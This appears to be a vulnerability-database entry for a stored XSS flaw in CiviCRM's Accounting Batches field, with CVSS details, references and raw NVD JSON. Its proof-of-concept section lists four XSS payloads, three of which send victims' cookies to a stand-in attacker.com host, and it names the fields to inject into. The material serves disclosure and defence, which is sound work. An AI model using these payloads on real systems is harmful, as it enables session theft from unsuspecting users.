CVE-2025-65187

Description

A Stored Cross Site Scripting vulnerability exists in CiviCRM before v6.7 in the Accounting Batches field. An authenticated user can inject malicious JavaScript into this field and it executes whenever the page is viewed.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:civicrm:civicrm:*:*:*:*:*:*:*:* - VULNERABLE

CiviCRM < 6.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-65187 Stored XSS PoC for CiviCRM Accounting Batches -->
<!-- Authenticated user injects malicious JavaScript into Accounting Batches field -->

<!-- Method 1: Script tag injection -->
<script>alert('XSS - CiviCRM CVE-2025-65187');document.location='https://attacker.com/steal?cookie='+document.cookie;</script>

<!-- Method 2: Image onerror event handler -->
<img src=x onerror="fetch('https://attacker.com/log?data='+document.cookie)">

<!-- Method 3: SVG element injection -->
<svg/onload=fetch('https://attacker.com/steal?c='+btoa(document.cookie))>

<!-- Method 4: Body onload event -->
<body onload="eval(atob('YWxlcnQoJ1hTUyBDVlItMjAyNS02NTE4Nyc='))">

<!-- Injection points: -->
<!-- 1. Batch Name field -->
<!-- 2. Batch Description field -->
<!-- 3. Accounting Batch reference fields -->

<!-- When victim views the page containing the batch, script executes automatically -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-65187
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-65187
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-65187/
[4] VulDB https://vuldb.com/cve/CVE-2025-65187
[5] https://civicrm.com/
[6] https://github.com/lukehebe/Vulnerability-Disclosures/blob/main/CVE-2025-65187.pdf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-65187", "sourceIdentifier": "[email protected]", "published": "2025-12-02T16:15:56.157", "lastModified": "2025-12-23T13:59:26.110", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Stored Cross Site Scripting vulnerability exists in CiviCRM before v6.7 in the Accounting Batches field. An authenticated user can inject malicious JavaScript into this field and it executes whenever the page is viewed."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:civicrm:civicrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.7.0", "matchCriteriaId": "A784BC9B-ABBB-4AFC-A8D3-A6A82122C0FC"}]}]}], "references": [{"url": "https://civicrm.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/lukehebe/Vulnerability-Disclosures/blob/main/CVE-2025-65187.pdf", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}